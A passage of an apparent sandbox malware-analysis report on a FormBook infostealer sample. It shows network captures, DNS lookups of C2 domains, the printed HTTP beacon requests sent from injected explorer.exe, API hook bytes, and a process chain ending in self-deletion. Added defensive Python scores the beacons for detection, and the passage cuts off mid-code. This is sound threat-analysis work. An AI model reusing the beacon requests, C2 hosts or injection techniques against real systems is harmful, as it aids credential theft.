                                          Nov 27, 2020 06:37:47.128029108 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:47.292691946 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.018973112 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019009113 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019030094 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019047976 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019066095 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019074917 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019092083 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019104004 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019130945 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019155025 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019174099 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019191980 CET | 80 | 49746 | 184.154.50.243 | 192.168.2.5
                                          Nov 27, 2020 06:37:48.019215107 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019238949 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019243002 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019247055 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:37:48.019258976 CET | 49746 | 80 | 192.168.2.5 | 184.154.50.243
                                          Nov 27, 2020 06:38:07.723004103 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:07.894550085 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:07.894740105 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:07.894825935 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:08.068506002 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:08.068561077 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:08.068598032 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:08.068630934 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:08.068656921 CET | 80 | 49747 | 23.27.109.19 | 192.168.2.5
                                          Nov 27, 2020 06:38:08.068849087 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:08.068891048 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:08.068949938 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19
                                          Nov 27, 2020 06:38:08.068964958 CET | 49747 | 80 | 192.168.2.5 | 23.27.109.19

                                          UDP Packets

                                           Timestamp                             Source Port  Dest Port  Source IP        Dest IP
                                           Nov 27, 2020 06:35:59.423458099 CET   54757        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:35:59.450866938 CET   53           54757      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:00.254846096 CET   49992        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:00.282181025 CET   53           49992      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:22.684704065 CET   60075        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:22.711971998 CET   53           60075      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:23.952682018 CET   55016        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:23.997966051 CET   53           55016      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:44.839894056 CET   64345        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:44.875737906 CET   53           64345      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:45.319561005 CET   57128        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:45.355184078 CET   53           57128      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:45.782104969 CET   54791        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:45.809331894 CET   53           54791      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:46.375197887 CET   50463        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:46.410703897 CET   53           50463      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:46.524899006 CET   50394        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:46.562680960 CET   53           50394      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:46.857793093 CET   58530        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:46.893222094 CET   53           58530      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:47.262835979 CET   53813        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:47.298357010 CET   53           53813      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:47.721534014 CET   63732        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:47.759166002 CET   53           63732      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:48.233823061 CET   57344        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:48.270900011 CET   53           57344      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:48.312632084 CET   54450        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:48.349679947 CET   53           54450      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:48.373967886 CET   59261        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:48.409102917 CET   53           59261      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:49.397313118 CET   57151        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:49.432845116 CET   53           57151      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:49.880383968 CET   59413        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:49.907641888 CET   53           59413      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:36:53.477510929 CET   60516        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:36:53.519870996 CET   53           60516      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:04.756514072 CET   51649        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:05.704509974 CET   53           51649      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:22.738609076 CET   65086        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:22.765702009 CET   53           65086      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:23.996509075 CET   56432        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:24.023689032 CET   53           56432      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:25.893688917 CET   52929        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:25.942146063 CET   53           52929      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:26.103823900 CET   64317        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:26.162023067 CET   53           64317      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:37:46.346628904 CET   61004        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:37:46.497160912 CET   53           61004      8.8.8.8          192.168.2.5
                                           Nov 27, 2020 06:38:07.318126917 CET   56895        53         192.168.2.5      8.8.8.8
                                           Nov 27, 2020 06:38:07.721736908 CET   53           56895      8.8.8.8          192.168.2.5

                                          DNS Queries

                                           Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                         Type            Class
                                           Nov 27, 2020 06:37:04.756514072 CET  192.168.2.5  8.8.8.8  0x7fe5    Standard query (0)  www.asojebu.com              A (IP address)  IN (0x0001)
                                           Nov 27, 2020 06:37:26.103823900 CET  192.168.2.5  8.8.8.8  0x74c     Standard query (0)  www.haircuressteampod.com    A (IP address)  IN (0x0001)
                                           Nov 27, 2020 06:37:46.346628904 CET  192.168.2.5  8.8.8.8  0xe6ba    Standard query (0)  www.porncamslivechat.com     A (IP address)  IN (0x0001)
                                           Nov 27, 2020 06:38:07.318126917 CET  192.168.2.5  8.8.8.8  0x5dad    Standard query (0)  www.amarilloautoexpress.com  A (IP address)  IN (0x0001)

                                          DNS Answers

                                           Timestamp                            Source IP    Dest IP      Trans ID  Reply Code      Name                         CName                 Address         Type                    Class
                                           Nov 27, 2020 06:37:05.704509974 CET  8.8.8.8      192.168.2.5  0x7fe5    Name error (3)  www.asojebu.com              none                  none            A (IP address)          IN (0x0001)
                                           Nov 27, 2020 06:37:26.162023067 CET  8.8.8.8      192.168.2.5  0x74c     Name error (3)  www.haircuressteampod.com    none                  none            A (IP address)          IN (0x0001)
                                           Nov 27, 2020 06:37:46.497160912 CET  8.8.8.8      192.168.2.5  0xe6ba    No error (0)    www.porncamslivechat.com     porncamslivechat.com  -               CNAME (Canonical name)  IN (0x0001)
                                           Nov 27, 2020 06:37:46.497160912 CET  8.8.8.8      192.168.2.5  0xe6ba    No error (0)    porncamslivechat.com         -                     184.154.50.243  A (IP address)          IN (0x0001)
                                           Nov 27, 2020 06:38:07.721736908 CET  8.8.8.8      192.168.2.5  0x5dad    No error (0)    www.amarilloautoexpress.com  -                     23.27.109.19    A (IP address)          IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.porncamslivechat.com
                                          • www.amarilloautoexpress.com

                                          HTTP Packets

                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                           0           192.168.2.5  49746        184.154.50.243  80                C:\Windows\explorer.exe
                                           Timestamp                            kBytes transferred  Direction  Data
                                           Nov 27, 2020 06:37:46.629072905 CET  5535                OUT        GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.porncamslivechat.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Nov 27, 2020 06:37:48.018973112 CET  5536                IN         HTTP/1.1 404 Not Found
                                          Date: Fri, 27 Nov 2020 05:37:46 GMT
                                          Server: Apache
                                          Link: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Set-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Referrer-Policy: no-referrer-when-downgrade
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 
3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73
                                          Data Ascii: 3d48<!doctype html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="apple-touch-icon" href="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/images/icon.png"><link rel="stylesheet" href="http://porncamslivechat.com/wp-content/cache/minify/2f682.css" media="all" /><link rel="pingback" href="http://porncamslivechat.com/xmlrpc.php" />...[if lt IE 9]><script src="http://porncamslivechat.com/wp-content/themes/pro-cam-mu/js/html5.js" type="text/javascript"></script><![endif]--><script src="http://porncamslivechat.com/wp-content/cache/minify/bffd0.js"></script>... This site is optimized with the Yoast SEO plugin v15.3 - https://yoast.com/wordpress/plugins/s


                                           Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
                                           1           192.168.2.5  49747        23.27.109.19    80                C:\Windows\explorer.exe
                                           Timestamp                            kBytes transferred  Direction  Data
                                           Nov 27, 2020 06:38:07.894825935 CET  5550                OUT        GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1
                                          Host: www.amarilloautoexpress.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Nov 27, 2020 06:38:08.068506002 CET  5551                IN         HTTP/1.1 200 OK
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Server: Nginx Microsoft-HTTPAPI/2.0
                                          X-Powered-By: Nginx
                                          Date: Fri, 27 Nov 2020 05:38:20 GMT
                                          Connection: close
                                          Data Raw: 33 0d 0a ef bb bf 0d 0a
                                          Data Ascii: 3
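
The two explorer.exe requests above are the entire command-and-control exchange this run produced, and they differ only in the Host header and the long encoded value; the path, both parameter names and the short parameter value are identical. The block below is an added example and not part of the Joe Sandbox report: it rebuilds those two requests as byte strings from the request line, headers and the seven NUL body bytes listed under Data Raw, adds one constructed browser request for contrast, scores each against the traits visible in the capture (no browser headers on a GET, Connection: close, a single short path segment, one long base64-alphabet value next to one short one, NUL bytes as the body of a GET) and extracts the constant parts as a pivot key. The indicator names, the 40-character and 16-character thresholds and the benign sample are my choices, not the report's.

```python
import re
from urllib.parse import urlsplit

# Constructed samples. The first two are the explorer.exe requests from the
# HTTP Packets table, rebuilt from the listed request line, headers and the
# seven NUL bytes under "Data Raw"; the third is a browser request made up
# for contrast.
SAMPLES = {
    "session0": (
        b"GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1\r\n"
        b"Host: www.porncamslivechat.com\r\n"
        b"Connection: close\r\n"
        b"\r\n"
        b"\x00\x00\x00\x00\x00\x00\x00"
    ),
    "session1": (
        b"GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1\r\n"
        b"Host: www.amarilloautoexpress.com\r\n"
        b"Connection: close\r\n"
        b"\r\n"
        b"\x00\x00\x00\x00\x00\x00\x00"
    ),
    "benign": (
        b"GET /index.html HTTP/1.1\r\n"
        b"Host: example.com\r\n"
        b"User-Agent: Mozilla/5.0\r\n"
        b"Accept: text/html\r\n"
        b"Accept-Language: en-US\r\n"
        b"Connection: keep-alive\r\n"
        b"\r\n"
    ),
}

BROWSER_HEADERS = ("user-agent", "accept", "accept-language")
# Long value drawn from the base64 alphabet (the captured blobs are 68 characters).
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# One short alphanumeric path segment with a trailing slash, e.g. "/unx5/".
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query params, headers, body.
    The query is split by hand because parse_qsl would turn the '+' inside the
    base64 value into a space."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = [part.partition("=")[::2] for part in url.query.split("&") if part]
    return {"method": method, "path": url.path, "params": params,
            "headers": headers, "body": body}


def beacon_indicators(req: dict) -> list:
    """Names of the beacon traits this request shows (labels chosen here, not the report's)."""
    hits = []
    h = req["headers"]
    if req["method"] == "GET" and not any(k in h for k in BROWSER_HEADERS):
        hits.append("no_browser_headers")
    if h.get("connection", "").lower() == "close":
        hits.append("connection_close")
    if PATH_RE.match(req["path"]):
        hits.append("short_single_segment_path")
    values = [v for _, v in req["params"]]
    if (len(values) == 2 and any(BASE64_RE.match(v) for v in values)
            and any(len(v) < 16 for v in values)):
        hits.append("long_base64_plus_short_param")
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {0}:
        hits.append("nul_body_on_get")
    return hits


def pivot_key(req: dict) -> tuple:
    """What the two captured beacons share once the host and the long blob are
    dropped: path, parameter names, short parameter values. This tuple is what
    to search proxy logs for to find the same bot talking to other hosts."""
    names = tuple(k for k, _ in req["params"])
    shorts = tuple(v for _, v in req["params"] if len(v) < 16)
    return (req["path"], names, shorts)


def triage(samples: dict, threshold: int = 4) -> dict:
    """Score each sample; attach a pivot key to those at or above the threshold."""
    out = {}
    for label, raw in samples.items():
        req = parse_request(raw)
        hits = beacon_indicators(req)
        out[label] = {
            "host": req["headers"].get("host"),
            "indicators": hits,
            "pivot": pivot_key(req) if len(hits) >= threshold else None,
        }
    return out


if __name__ == "__main__":
    for label, result in triage(SAMPLES).items():
        print(label, result["host"], result["indicators"], result["pivot"])
```

Both captured requests hit all five traits and collapse to the same pivot key, ("/unx5/", ("YBZpk4k0", "Wt"), ("LhnLHro0q",)), which ties the four DNS lookups above (two NXDOMAIN, two resolved and then contacted) to one bot rotating through hosts rather than four unrelated queries. Neither server answered with anything usable: the first returned a 404 with its WordPress theme, and the 200 from the second carries a single 3-byte chunk (EF BB BF, the UTF-8 byte-order mark) and nothing else.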


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                           Function Name  Hook Type  Active in Processes
                                           PeekMessageA   INLINE     explorer.exe
                                           PeekMessageW   INLINE     explorer.exe
                                           GetMessageW    INLINE     explorer.exe
                                           GetMessageA    INLINE     explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                           Function Name  Hook Type  New Data
                                           PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8F 0xFE 0xEA
                                           PeekMessageW   INLINE     0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                           GetMessageW    INLINE     0x48 0x8B 0xB8 0x87 0x7E 0xEA
                                           GetMessageA    INLINE     0x48 0x8B 0xB8 0x8F 0xFE 0xEA

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                           Start time: 06:36:03
                                           Start date: 27/11/2020
                                           Path: C:\Users\user\Desktop\emthree.exe
                                           Wow64 process (32bit): true
                                           Commandline: 'C:\Users\user\Desktop\emthree.exe'
                                           Imagebase: 0xf40000
                                           File size: 459776 bytes
                                           MD5 hash: 25B5788669A3A8F35596CE975F0823A7
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: .Net C# or VB.NET
                                           Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmp, Author: Joe Security
                                           Reputation: low

                                          General

                                           Start time: 06:36:10
                                           Start date: 27/11/2020
                                           Path: C:\Users\user\Desktop\emthree.exe
                                           Wow64 process (32bit): true
                                           Commandline: {path}
                                           Imagebase: 0x460000
                                           File size: 459776 bytes
                                           MD5 hash: 25B5788669A3A8F35596CE975F0823A7
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: C, C++ or other language
                                           Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                           Reputation: low

                                          General

                                           Start time: 06:36:12
                                           Start date: 27/11/2020
                                           Path: C:\Windows\explorer.exe
                                           Wow64 process (32bit): false
                                           Commandline:
                                           Imagebase: 0x7ff693d90000
                                           File size: 3933184 bytes
                                           MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: C, C++ or other language
                                           Reputation: high

                                          General

                                           Start time: 06:36:25
                                           Start date: 27/11/2020
                                           Path: C:\Windows\SysWOW64\rundll32.exe
                                           Wow64 process (32bit): true
                                           Commandline: C:\Windows\SysWOW64\rundll32.exe
                                           Imagebase: 0xac0000
                                           File size: 61952 bytes
                                           MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: C, C++ or other language
                                           Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                           Reputation: high

                                          General

                                           Start time: 06:36:29
                                           Start date: 27/11/2020
                                           Path: C:\Windows\SysWOW64\cmd.exe
                                           Wow64 process (32bit): true
                                           Commandline: /c del 'C:\Users\user\Desktop\emthree.exe'
                                           Imagebase: 0x150000
                                           File size: 232960 bytes
                                           MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: C, C++ or other language
                                           Reputation: high

                                          General

                                           Start time: 06:36:30
                                           Start date: 27/11/2020
                                           Path: C:\Windows\System32\conhost.exe
                                           Wow64 process (32bit): false
                                           Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                           Imagebase: 0x7ff797770000
                                           File size: 625664 bytes
                                           MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
                                           Has elevated privileges: true
                                           Has administrator privileges: true
                                           Programmed in: C, C++ or other language
                                           Reputation: high
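
The six process entries above are the chain the signature list summarises as process hollowing, injection into explorer.exe and self-deletion: emthree.exe starts a second copy of itself seven seconds later (same file, but the second instance is classified as native code rather than .NET and carries the FormBook Yara hits at 0x400000), explorer.exe then makes the C2 requests, a 32-bit rundll32.exe appears with no DLL on its command line, and cmd.exe deletes the original sample. The block below is an added example and not part of the report: it copies the start times, paths, command lines and Wow64 flags from those entries into process-start events (the `{path}` command line is kept as the report's placeholder), adds one constructed benign rundll32 invocation for contrast, and runs three rules that need only per-process fields and ordering, because the report gives no parent PIDs. The rule names and the 30-second window are my choices.

```python
import re
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class ProcStart:
    start: datetime
    path: str      # image path as the report lists it
    cmdline: str   # command line as the report lists it ("{path}" is the report's placeholder)
    wow64: bool


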